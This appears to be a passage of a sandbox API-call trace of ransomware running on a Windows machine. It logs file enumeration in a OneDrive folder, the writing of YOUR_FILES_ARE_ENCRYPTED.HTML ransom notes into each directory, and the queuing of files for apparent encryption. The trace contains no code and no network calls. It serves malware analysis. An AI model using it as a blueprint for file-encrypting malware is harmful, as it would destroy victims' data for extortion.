[0113.480] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\et\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\et\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.480] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.481] CloseHandle (hObject=0x32c) returned 1 [0113.481] GetProcessHeap () returned 0x600000 [0113.481] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.481] GetProcessHeap () returned 0x600000 [0113.481] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.482] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd410ff09, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd410ff09, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd4810e0d, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x72c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ETWlog.dll", cAlternateFileName="")) returned 1 [0113.482] StrStrIW (lpFirst="ETWlog.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.482] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ETWlog.dll") returned 86 [0113.482] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0113.482] lstrlenW (lpString=".dll") returned 4 [0113.482] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0113.482] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ETWlog.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\etwlog.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0113.483] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=29376) returned 1 [0113.483] GetProcessHeap () returned 0x600000 [0113.483] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.486] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="2D") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="D9") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="8A") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="C1") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="3F") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="7A") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="AB") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C4") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="F0") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="1E") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="51") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="88") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="FE") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="58") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="2A") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="E1") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="2D") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="32") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="18") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="88") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="55") returned 2 [0113.486] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="49") returned 2 [0113.486] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="9B") returned 2 [0113.486] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="23") returned 2 [0113.486] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="51") returned 2 [0113.486] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="13") returned 2 [0113.486] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="3A") returned 2 [0113.486] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="56") returned 2 [0113.486] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="9C") returned 2 [0113.486] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="78") returned 2 [0113.486] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="40") returned 2 [0113.486] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="03") returned 2 [0113.487] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ETWlog.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ETWlog.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ETWlog.dll" [0113.487] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.487] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.487] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x79ce210c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x79ce210c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x79ce210c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="eu", cAlternateFileName="")) returned 1 [0113.487] StrStrIW (lpFirst="eu", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.487] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\eu") returned 78 [0113.487] GetProcessHeap () returned 0x600000 [0113.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.488] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\eu" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\eu") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\eu" [0113.488] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\eu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\eu\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\eu\\*" [0113.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\eu\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x79ce210c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x79ce210c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7b33be0e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc329b43, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.489] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x79ce210c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x79ce210c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7b33be0e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc329b43, cFileName="..", cAlternateFileName="")) returned 1 [0113.489] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b33be0e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7b33be0e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7b420d9c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x158c0, dwReserved0=0x19e010, dwReserved1=0xfc329b43, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.489] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.489] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\eu\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.489] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.489] lstrlenW (lpString=".mui") returned 4 [0113.489] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.489] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b33be0e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7b33be0e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7b420d9c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x158c0, dwReserved0=0x19e010, dwReserved1=0xfc329b43, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.489] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.489] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\eu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.489] GetProcessHeap () returned 0x600000 [0113.489] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\eu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\eu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.490] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.491] CloseHandle (hObject=0x330) returned 1 [0113.491] GetProcessHeap () returned 0x600000 [0113.491] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.491] GetProcessHeap () returned 0x600000 [0113.491] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.492] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd514dfac, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd514dfac, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd80fd0fc, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x4e5f, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ExclusionList.xml", cAlternateFileName="EXCLUS~1.XML")) returned 1 [0113.492] StrStrIW (lpFirst="ExclusionList.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.492] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ExclusionList.xml") returned 93 [0113.492] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0113.492] lstrlenW (lpString=".xml") returned 4 [0113.492] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0113.492] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ExclusionList.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\exclusionlist.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0113.492] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=20063) returned 1 [0113.492] GetProcessHeap () returned 0x600000 [0113.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0113.495] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="4C") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="0A") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="90") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="D6") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="EA") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="3A") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="DA") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C4") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="DB") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="C4") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="40") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="91") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="9A") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="17") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="AE") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="EF") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="E2") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="EB") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="41") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="7D") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="03") returned 2 [0113.495] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="10") returned 2 [0113.495] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="75") returned 2 [0113.495] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="C5") returned 2 [0113.495] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="0F") returned 2 [0113.495] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="14") returned 2 [0113.495] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="FD") returned 2 [0113.495] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="14") returned 2 [0113.495] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="99") returned 2 [0113.495] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="32") returned 2 [0113.495] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="E3") returned 2 [0113.495] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="39") returned 2 [0113.496] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ExclusionList.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ExclusionList.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ExclusionList.xml" [0113.496] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.496] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0113.496] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b46d246, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7b46d246, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7b46d246, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="fa", cAlternateFileName="")) returned 1 [0113.496] StrStrIW (lpFirst="fa", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.496] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fa") returned 78 [0113.496] GetProcessHeap () returned 0x600000 [0113.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0113.497] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fa" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fa") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fa" [0113.497] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fa", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fa\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fa\\*" [0113.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fa\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b46d246, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7b46d246, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7b90bbb9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.497] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b46d246, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7b46d246, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7b90bbb9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName="..", cAlternateFileName="")) returned 1 [0113.497] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b90bbb9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7b90bbb9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7bad5697, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.498] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.498] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fa\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.498] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.498] lstrlenW (lpString=".mui") returned 4 [0113.498] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.498] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b90bbb9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7b90bbb9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7bad5697, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xf9a75f, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.498] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.498] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fa\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.498] GetProcessHeap () returned 0x600000 [0113.498] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fa\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\fa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.499] WriteFile (in: hFile=0x324, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.500] CloseHandle (hObject=0x324) returned 1 [0113.500] GetProcessHeap () returned 0x600000 [0113.500] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.500] GetProcessHeap () returned 0x600000 [0113.500] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0113.500] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7bb21b30, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7bb21b30, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7bb21b30, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="fi", cAlternateFileName="")) returned 1 [0113.500] StrStrIW (lpFirst="fi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.500] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fi") returned 78 [0113.500] GetProcessHeap () returned 0x600000 [0113.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0113.500] lstrcpyW (in: lpString1=0x30c81a0, 